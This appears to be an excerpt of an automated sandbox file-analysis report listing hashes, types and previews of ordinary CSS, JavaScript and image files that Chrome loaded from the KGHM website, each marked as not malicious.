                                          SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.w3schools.com/w3css/4/w3.css
                                          Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):161
                                          Entropy (8bit):5.003746171198825
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FFB04D8A7682EC1CB755B24E01C73DF3
                                          SHA1:F681E788AF1ED3ED04A7ACAAAF99F69A90BCEDF3
                                          SHA-256:896C2C76185F1623D0CE616E09D10BEB7AA410149B644300707EFB9D371C9D41
                                          SHA-512:9F22DFCAB773608D9690AB94E326C47641F49C40E873EA68476B1819B88056C77A63DF6BB6F5EB9369C431EF935984534B1074C0C00AEDE407DA7A5A9F1124AF
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:(o=>{Drupal.behaviors.jqueryZoom={attach(){o("img.jquery-zoom").wrap('<div class="jquery-zoom-container" />'),o("div.jquery-zoom-container").zoom()}}})(jQuery);.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:assembler source, Unicode text, UTF-8 text, with very long lines (29919)
                                          Category:downloaded
                                          Size (bytes):79479
                                          Entropy (8bit):5.07874069881604
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:24FE33B5C013D4B31D52B732D386BC4F
                                          SHA1:A60F5F9EFBC329810AE9C3F0ED80FB5435BD7664
                                          SHA-256:17E53DAFC06E6E34463DB20008C0790B9E00F3CB406DC33C52C70E2DDCC21359
                                          SHA-512:CC52631DB0F51D9CD3AAFBA7A94351E330EFCB3DAB0B7140E878F3C2AA2E54E0F12139C0AF5B3F32018255D5403460B691FA9AD821E012419D66F56DDBACA884
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/css/css_uaG7_Nb7ZTR4F3O6AwoUxX0hERpjToTqtReKIjbUCN0.css?delta=0&language=pl&theme=kghm&include=eJx1UWtaAyEMvBAsR-LLQgq4QJCAdT29lG2rtfUPTGbyDljbCPKu4AqWU6XcBO_cMKkVGIWJwLw_4ITM4JCFoYoqU00QwxeKzfmkXKQVouS2x5DdA_fGh-mpyUS2R5QVSwSDCUdV7NoQbQHHl0oMkA2qV6S2eIIem0js9Nt7x7rrkQ-iOgw5jdsUB7ccWUSBCq5C8axs7QXi8sMsPZe-xsAe7dHpXZPyhNB6RSvHWJs8h-ZlSHMLfz1biFdWcyOzafw0HrJD1XxFlIZiT_k57l5hJpAcg8X65JUg5Jt2vUcmi6KtOqGDsck-6oyNLr8YkWgdSfVUDywvWIJpgUYvD_qMmP2XMaBuRJHVfO_-r6ajjJfloPgIeGY13-W4s2CEaryGEjT0EXa5JTZU__DfRKwCYg
                                          Preview:/* @license GNU-GPL-2.0-or-later https://www.drupal.org/licensing/faq */..ui-helper-hidden{display:none;}.ui-helper-hidden-accessible{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;}.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size:100%;list-style:none;}.ui-helper-clearfix:before,.ui-helper-clearfix:after{content:"";display:table;border-collapse:collapse;}.ui-helper-clearfix:after{clear:both;}.ui-helper-zfix{width:100%;height:100%;top:0;left:0;position:absolute;opacity:0;-ms-filter:"alpha(opacity=0)";}.ui-front{z-index:100;}.ui-state-disabled{cursor:default !important;pointer-events:none;}.ui-icon{display:inline-block;vertical-align:middle;margin-top:-.25em;position:relative;text-indent:-99999px;overflow:hidden;background-repeat:no-repeat;}.ui-widget-icon-block{left:50%;margin-left:-8px;display:block;}.ui-widget-overlay{position:fixed;top:0;left:0;width:100%;height:100%;}..ui-a
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 15 x 16, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):270
                                          Entropy (8bit):6.277496689509155
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9E4A44BC5D640A4036431A318D5D1A2B
                                          SHA1:56462C8AB9B6D0F0B416460C733123BAB069EA79
                                          SHA-256:73AB3BA885BF156501E9EF6FD42BBB3554E313BD237D2FCDEA2E813CC4369A14
                                          SHA-512:D1DFD2203A0BB8CF1F25D35D05B51D80541D817935427D0486394982626501D2F3B80D0B1B1DB3EE956AD69E6A696859F0268D6D05DD6F37449EEE8E83A8EA28
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR................6....sRGB...,....6PLTE.......................................................;p.....tRNS. .0p......P`.........hIDATx.M.I.. ...bv...g..R..Y.!..k.... \=rO..H.=.7..R...L........`...G~..<O.....=.... .._@US..E..G...\..na.2.....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):44
                                          Entropy (8bit):4.31705292530797
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:27902FD90146079308EBEFB17AA1BE38
                                          SHA1:141B37E5E3333DDC46BF71923E38080B4B887D6D
                                          SHA-256:EB6D3A0507835F5A3CF5BD6FFE1C1B4A7D67A31AD671875A135F19158C8CB9F6
                                          SHA-512:6574F7866146B2DE901A359832AB83CEFEDC544B3B3A0EE7A8BE542BA95CA8B1658AAC950E665F565C98BB7CDC8B9C91BCFA52AA6A00E9AFBD5208A561385F89
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAka8RqbREQQSBIFDc5BTHo=?alt=proto
                                          Preview:Ch8KHQ3OQUx6GgQISxgCKhAIClIMCgJAIRABGP////8P
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (5478)
                                          Category:dropped
                                          Size (bytes):7804
                                          Entropy (8bit):5.24878138574915
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E5D9B36F2D06C1703D26580BDA9A8CA0
                                          SHA1:115F9569FF864CC35AE29F6E1304CD8FDF92B749
                                          SHA-256:FAAC67700F2632CF97D5656037A623C6ECAFEDB18E2B2F4237A7B3067F133AC2
                                          SHA-512:AE5ED1A47323537001018FA8A4708B5B9571F59BB89CEBFF9F3F9E95664FAA134DCF2235F77A502F6A9C3E3E713DED827B4D3F4994181325B45FC7A40B41A846
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/* @license GNU-GPL-2.0-or-later https://www.drupal.org/licensing/faq */.(function(factory){if(typeof define==='function'&&define.amd)define(['jquery'],factory);else if(typeof exports==='object')module.exports=factory(require('jquery'));else factory(jQuery);}(function($){var pluses=/\+/g;function encode(s){return config.raw?s:encodeURIComponent(s);}function decode(s){return config.raw?s:decodeURIComponent(s);}function stringifyCookieValue(value){return encode(config.json?JSON.stringify(value):String(value));}function parseCookieValue(s){if(s.indexOf('"')===0)s=s.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,'\\');try{s=decodeURIComponent(s.replace(pluses,' '));return config.json?JSON.parse(s):s;}catch(e){}}function read(s,converter){var value=config.raw?s:parseCookieValue(s);return $.isFunction(converter)?converter(value):value;}var config=$.cookie=function(key,value,options){if(arguments.length>1&&!$.isFunction(value)){options=$.extend({},config.defaults,options);if(typeof options.e
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 380x241, Suserng: [none]x[none], YUV color, decoders should clamp
                                          Category:downloaded
                                          Size (bytes):22062
                                          Entropy (8bit):7.991335900221498
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:8C76C44DF185DF58B79A00F30DF82E85
                                          SHA1:261A5CA20C63B692E9344C0182CB78C5BA55DF36
                                          SHA-256:1309C4326803C0431F76807BDDFE7BDD9DFF33F36D3441F60D9936D033128776
                                          SHA-512:F624613B464F88F955B3A5E2FA9C2E60918392C190C799E81FEE1C67C9AEC2560F4D434C073A683BC48A6530D00A1FA31B4ECF353C90320824BB84BCE55373B4
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/styles/modular_page_featured_tile/public/2022-07/tile-3.png.webp?itok=JOYyCTsw
                                          Preview:RIFF&V..WEBPVP8 .V.......*|...>m,.F$"....]....dm.0;..,S..C./...z;._t.....N.{?............W....|~.......{............~........?..._....{`..........3.g..~.{.d.....F...'......S.S...}B...q.}.W3.G...y.}..m.....%./`.....@}..W.....=...P.S{......%.c.lbm....I.y..&X....W<..H&..l....[..w.^.......E?..5...x..".N7,..=w.K0....;....,.......z...6c.C.80....AV]I..q..+..DW.'.?>..v2....&.9.....?.d:...5.N.f..<.x.f;.%8.L.TIy..@.0..PG.7.:.n.0..t/?.......4.N..g.....?.m..k'H..s".2{nO...R.+.......pr.<)..yM.mY3...@..RF.....1..z.`F..Q......Bk..j.~....Q..o.....u!..k.X.h.&..W...{...../...l.\yF..=>.....s.^.g;...."....j.-A.....Y..[....:./..<.[..f.....-..k.....e=....^*....qv..nX.@..`.;m...I^......:..z....}B......*.......D....MV-....w8........4b....I..{x.o..G.^:.n....<.A#.o..B.A.Aw.q..q.7.^..e...X..t...h>..-4...mf.Cr@.....h.!.M[2%..|..$Z$$.....^.c......j{u{...|]..[....u.."E[.fuQ.I%..+...^?.1C.9...+..QCk...Q5..p.X.C@.......:...WV..F..2t..[...E...O...........T.WU..(.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 13 x 13, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):1654
                                          Entropy (8bit):5.7388352290853515
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3C5C6D54149B002D7046D17693CCA0FE
                                          SHA1:27408FD2B37BE268A06FB9CEECB1E806363A1055
                                          SHA-256:87EF77C1E7637A2927F93F40BEA08F7C11CF6F798D9152205DE46F23A3BB9A62
                                          SHA-512:349244B17D32288477328FFD3C6720879C6B352C4633E06F3539822B996D447C9CF544265A7596D355098560E74C9CBB5837A41E4CC969A1988C48A178D8680F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR.............r..|....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.5 (Macintosh)" xmp:CreateDate="2022-05-05T13:20:54+02:00" xmp:ModifyDate="2022-05-05T13:51:21+02:00" xmp:MetadataDate="2022-05-05T13:51:21+02:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:2b9184bc-12d0-46ea-9e68-d6de115d16e6" xmpMM:DocumentID="adobe:docid:photoshop:6338650e-4414-0e49-a0ee-67b366a489e
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 190 x 59, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):7115
                                          Entropy (8bit):7.916794465372544
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:ECBB62C9138A7340667C30308ECB5DA0
                                          SHA1:0828DB5CCD9040EEF02D22A42B856A0B3C5D9798
                                          SHA-256:EB22E0BEA9EA63D3D1F2316048F4F67A45FD0E784400342DAA21D107DD895923
                                          SHA-512:26EA1B6BFCAFBD4C44521D51DEAB01B552FCE5A06CAA6D1F76DEACFE3693258B990A966A5CEF1B363916857841E7A9EC20F238A091E8B6C14156382D49A8C31A
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/images/logo.png
                                          Preview:.PNG........IHDR.......;.............tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D089F7EDB11211E4873DB0534DCD4E5F" xmpMM:InstanceID="xmp.iid:D089F7ECB11211E4873DB0534DCD4E5F" xmp:CreatorTool="Adobe Photoshop CS6 Windows"> <xmpMM:DerivedFrom stRef:instanceID="968420AAAEE7B2C788597D8DC318799C" stRef:documentID="968420AAAEE7B2C788597D8DC318799C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Dp......PLTE......ddd....qY....we.^CyM7.lU.cI.........IHHgZO..............T:...bK.lR...uuu.kR......y...kUYdq.jL......010....lSTTT.fQ
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (53175)
                                          Category:dropped
                                          Size (bytes):53249
                                          Entropy (8bit):5.118349903988674
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6EDEB93E1FBAC65033C8927120E3B680
                                          SHA1:8D245D6E71CD33CE7A0B75307146749F3EC1AB31
                                          SHA-256:04E1644A452BED99F763E79FFA615860CF8B3C7DEDEC2E432A92BD1D8FEEED45
                                          SHA-512:DCABD7BE460421F7057B051E52EB99F9F419253B2E66A6CBE636AF4677AF6EBFB7312A5D336B7ECA0CC76761AC65D3ED7E8FFD27E2BFF1F2AF23BC6AF18F1586
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/* @license GNU-GPL-2.0-or-later https://www.drupal.org/licensing/faq */.(function(factory){"use strict";if(typeof define==="function"&&define.amd)define(["jquery"],factory);else if(typeof exports!=="undefined")module.exports=factory(require("jquery"));else factory(jQuery);})(function($){"use strict";var Slick=window.Slick||{};Slick=(function(){var instanceUid=0;function Slick(element,settings){var _=this,dataSettings;_.defaults={accessibility:true,adaptiveHeight:false,appendArrows:$(element),appendDots:$(element),arrows:true,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:false,autoplaySpeed:3000,centerMode:false,centerPadding:"50px",cssEase:"ease",customPaging:function(slider,i){return $('<button type="button" />').text(i+1);},dots:false,dotsClass:"slick-dots",draggable:true,easing:"linear",edgeFriction:0.35,fade:false,focusOnSelect:
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with very long lines (1510)
                                          Category:dropped
                                          Size (bytes):1511
                                          Entropy (8bit):4.954534795595908
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:87A565B3FE6CA9853AC492750B515964
                                          SHA1:7C60175FCF23EC523188AC491D6EFD53F9B45D42
                                          SHA-256:BBF3B16C21C48CF7AD01DE8A7BAE22F8B9C355C529E9BBBB711E7A6D3A7C05EB
                                          SHA-512:DAF67D512802977979EDC55A4FAF5D2577EE8E2EC0F43F528A1DE9115FDB094D5065B92062DF1F375904CAC6546E3B59E43291F52D94C8D727CE02671C626973
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:(t=>{Drupal.behaviors.accordions={attach(){window.location.pathname.indexOf("/edit/")===-1&&window.location.pathname.indexOf("/admin/")<0&&t(".cassetto-titolo").length&&(t(".cassetto-titolo",".node").each((s,o)=>{t(o).next().hasClass("cassetto-corpo")||(t(o).nextUntil(".cassetto-titolo, .cassetto-titolo-fine").wrapAll('<div class="cassetto-corpo" />'),t(o).css("cursor","pointer"))}),t("div.cassetto-corpo").hide(),t(".cassetto-titolo").addClass("cassetto-titolo-chiuso"),t(".cassetto-titolo").unbind().click(s=>{t(s.currentTarget).next("div.cassetto-corpo").slideToggle("slow").siblings("div.cassetto-corpo:visible").slideUp("fast"),t(s.currentTarget).toggleClass("cassetto-titolo-aperto").siblings().removeClass("cassetto-titolo-aperto")}),t(".cassetto-titolo:even").addClass("cassetto-titolo-pari"),t(".cassetto-titolo:odd").addClass("cassetto-titolo-dispari"),t(".cassetto-corpo:even").addClass("cassetto-corpo-pari"),t(".cassetto-corpo:odd").addClass("cassetto-corpo-dispari"))}};function a(s)
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (50758)
                                          Category:dropped
                                          Size (bytes):51039
                                          Entropy (8bit):5.247253437401007
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:67176C242E1BDC20603C878DEE836DF3
                                          SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                          SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                          SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75", baseline, precision 8, 1200x188, components 3
                                          Category:dropped
                                          Size (bytes):18050
                                          Entropy (8bit):7.792891320552468
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7EFEC51D4D598E940EEF86DC2DA0942D
                                          SHA1:34EBA979F750C1BEAC18014FAF0BD1970EA5463C
                                          SHA-256:B1E3DBD2488AC6F9EDC1D8B0559B99FAA73D6AC10791DA8350AD481BE6FA608B
                                          SHA-512:958F409F69BBDD3753670A55361B2A22E236BD0A16ED39C6802F389465EF1BE809D614A7AA16CC71F9B6A17E0861F007C7C94285932D871232839CDAF6D07915
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......QE....P..+Q.I...?<N.?.;..q^.a{..a..n.d..._;.|5..d...|..=../....M......Q@..Q@..Q@..Q@..Q@..Q@..Q@..R...8...-....?.t..>t.....P.~$.......G.x..Q/...o...(.j.k2..f...'...G...)..=...].~9..:j+.F.^..7.iq...R...z...@..Q@..Q@..Q@..Q@..Q@.5+..=:{9..*..{....Y..Mi8.1S..^.\..-..5h...6;.c.+..O.<.....W..(....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (2550)
                                          Category:downloaded
                                          Size (bytes):2852
                                          Entropy (8bit):5.117267443632303
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D0DD08E9328434257D64DFA7E71A1C4B
                                          SHA1:79250E55C3F54D44C280D9E4C95E8AAAFB6CF2F8
                                          SHA-256:B5EDC89C1D041F98CBFC5CBF16937180518E352F607D21B3573993D116C03992
                                          SHA-512:9CA3F7F9352AF9BB6FE725533A8005B707911315FCE0912F39BC2C0623D2FCB795AA24A7726D0CB5516AE68A27AF9D390E597CC17B49C6519DE4729740B6430F
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/js/js_yxvXLSV0cCy1iqSml9HQ5nF81BNdzGFVmvmQiwi2Gp4.js?scope=footer&delta=2&language=pl&theme=kghm&include=eJx1UWtaAyEMvBAsR-LLQgq4QJCAdT29lG2rtfUPTGbyDljbCPKu4AqWU6XcBO_cMKkVGIWJwLw_4ITM4JCFoYoqU00QwxeKzfmkXKQVouS2x5DdA_fGh-mpyUS2R5QVSwSDCUdV7NoQbQHHl0oMkA2qV6S2eIIem0js9Nt7x7rrkQ-iOgw5jdsUB7ccWUSBCq5C8axs7QXi8sMsPZe-xsAe7dHpXZPyhNB6RSvHWJs8h-ZlSHMLfz1biFdWcyOzafw0HrJD1XxFlIZiT_k57l5hJpAcg8X65JUg5Jt2vUcmi6KtOqGDsck-6oyNLr8YkWgdSfVUDywvWIJpgUYvD_qMmP2XMaBuRJHVfO_-r6ajjJfloPgIeGY13-W4s2CEaryGEjT0EXa5JTZU__DfRKwCYg
                                          Preview:/* @license GNU-GPL-2.0-or-later https://www.drupal.org/licensing/faq */.(function(Drupal){'use strict';Drupal.behaviors.addToAny={attach:function(context,settings){if(context!==document&&window.a2a)a2a.init_all();}};})(Drupal);;./*!. Zoom 1.7.21. license: MIT. http://www.jacklmoore.com/zoom.*/.(function(o){var t={url:!1,callback:!1,target:!1,duration:120,on:"mouseover",touch:!0,onZoomIn:!1,onZoomOut:!1,magnify:1};o.zoom=function(t,n,e,i){var u,c,a,r,m,l,s,f=o(t),h=f.css("position"),d=o(n);return t.style.position=/(absolute|fixed)/.test(h)?h:"relative",t.style.overflow="hidden",e.style.width=e.style.height="",o(e).addClass("zoomImg").css({position:"absolute",top:0,left:0,opacity:0,width:e.width*i,height:e.height*i,border:"none",maxWidth:"none",maxHeight:"none"}).appendTo(t),{init:function(){c=f.outerWidth(),u=f.outerHeight(),n===t?(r=c,a=u):(r=d.outerWidth(),a=d.outerHeight()),m=(e.width-c)/r,l=(e.height-u)/a,s=d.offset()},move:function(o){var t=o.pageX-s.left,n=o.pageY-s.top;n=Math
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image
                                          Category:dropped
                                          Size (bytes):446
                                          Entropy (8bit):7.249571552497745
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:614DC183B5D38EF45C052529FB43D107
                                          SHA1:0A31CB746494B1DCAAB01CE17A951A1B0595483A
                                          SHA-256:C98D1B81DF813C5C2BD59C98D777DE067B84D0F148EACF9CDEA70DEC30A45C20
                                          SHA-512:1F456049C93500373868BF1CC02F6FAD140C60D553028CCE49D4FCD00B977CA424B9AAA5A6A9CF925E51DE6A00B4BE47758360A4F52025D5E42A61D839B19A78
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:RIFF....WEBPVP8X..............ALPH.......m.Gwl.v*.b..\.Q9Y.S.m.6*g......c.........?.K.<$#..y?..yY..E2...e..<K.:.r...O[....PIvB......?.A...)n....&O5!..'.1I.9D...Q.=o]!....~....d..\.+.B0..Q..=#....)Bq.....z... .O.....P.Y.(.3....($;....._....E..........~.&.....-.ZB...?.VP8 ....0....*....>m0.G.".!(.....l......b.6..`..=.:R..'9.....p.9.8%.&..hb.E..n.xI@.f.....v.L..UL.....)O.X......3x.....tD.....{..7. .....>.t....%>.V.J....D.....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (633)
                                          Category:downloaded
                                          Size (bytes):634
                                          Entropy (8bit):4.899572670739918
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:534F957B935FFC9126D64C35C59473EF
                                          SHA1:49F0B739814221FB64C2B7063DC5BE666BE909BC
                                          SHA-256:7FFD419A361FCB9FCF1F8E7AEF6F9783F70362F8348F13FB4F8F89F74361DA27
                                          SHA-512:B1D0EB73E70201F4F9B738CF5DDBCAC5571752AE2035EAF57CFC564F5C393894A8486B504FB8EF7883EFF5462320D4B1641248F6B079C0223ADE7CB49918EB3B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/js/featured-tiles-slider-deMlpnLH.js?sm23fd
                                          Preview:((e,i)=>{i.behaviors.initTilesSlider={attach(){e(".paragraph--type--featured-tiles-slider .field--name-field-add-slide").not(".slick-initialized").slick({infinite:!0,slidesToShow:1,slidesToScroll:1,dots:!1,arrows:!0,autoplay:!1,variableWidth:!0,asNavFor:".paragraph--type--featured-tiles-slider .featured-tiles__titles"}),e(".paragraph--type--featured-tiles-slider .featured-tiles__titles").not(".slick-initialized").slick({infinite:!0,slidesToShow:4,slidesToScroll:1,dots:!1,arrows:!1,autoplay:!1,variableWidth:!0,asNavFor:".paragraph--type--featured-tiles-slider .field--name-field-add-slide",focusOnSelect:!0})}}})(jQuery,Drupal);.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:downloaded
                                          Size (bytes):71585
                                          Entropy (8bit):5.512097906708585
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B0B52E840E29CC0F25C22484F7ED45A6
                                          SHA1:82259974AAE6557BA2B7EBB8DBD8863B6DB1629D
                                          SHA-256:1CD3F28CDD95B9189601F65545A6FC9095734F3BF7D2F74F13E60D86FC86DA77
                                          SHA-512:09AC28620DD93CB57CA911EE6EF55B43BCF87DA2CADB361C23067FD1343C1CB866CC26448FFD62338D51C82CD49FF79D08B38DF6EE8E360B4CF39B4DF8D09F38
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://static.addtoany.com/menu/modules/core.m4v434v2.js
                                          Preview:let t=".m4v434v2",J=window,K=document,p=function(){},X=void 0;J.a2a_config=J.a2a_config||{};var e={louserze:J.a2a_louserze||{},static_server:J.a2a_config.static_server||"https://static.addtoany.com/menu",templates:{},native:X,onclick:2,orientation:X,track_links:X,track_links_key:"",callbacks:[],tracking_callback:X,add_services:!1,thanks:{},locale:X,no_3p:X,icon_color:X,color_main:X,color_bg:X,color_border:X,color_link_text:X,color_link_text_hover:X,counts:X,overlays:[]};let T={num_services:8,prioritize:X,exclude_services:X,custom_services:X,delay:0,show_menu:X,bookmarklet:X},B={linkmedia:X,linkname:X,linkurl:X,linkname_escape:X,menu_type:X,target:X},Z={...e,...T,...B},N=function(){for(var e in J.a2a_config)Z[e]=J.a2a_config[e]},L=function(e){for(var a in e)Z[a]=e[a],J.a2a_config[a]&&(J.a2a_config[a]=e[a])},u=(N(),"https://static.addtoany.com/menu"),o=["feed","mail","page"],y,w=0,z=e=>{e?w=e.a2a_index:x&&(w=x)},j=0,Q={},n={feed:[],page:[]},i=["a2a","share1","share2"],M={},ce=[],de=[],x=
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (388)
                                          Category:dropped
                                          Size (bytes):389
                                          Entropy (8bit):4.822643371249776
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:159E8149718EC11D9FACEF3B0C65044C
                                          SHA1:5AC75206D4F304436FFCF83E7730E9E07B36987D
                                          SHA-256:F8A15935E59FB85B1766E9AC2A70DE44197449D99D7E28DCCF84615FC2EA79B7
                                          SHA-512:C0237D7E1E0BB775344C50BCDAE2A15A65B67ACDD3BEC5A40D3E74441CC0F4EDEAE5D2C5F38DB842048FF618CD28312FCB1823B63FF73D1AACCE02EA83A411A9
                                          Malicious:false
                                          Reputation:unknown
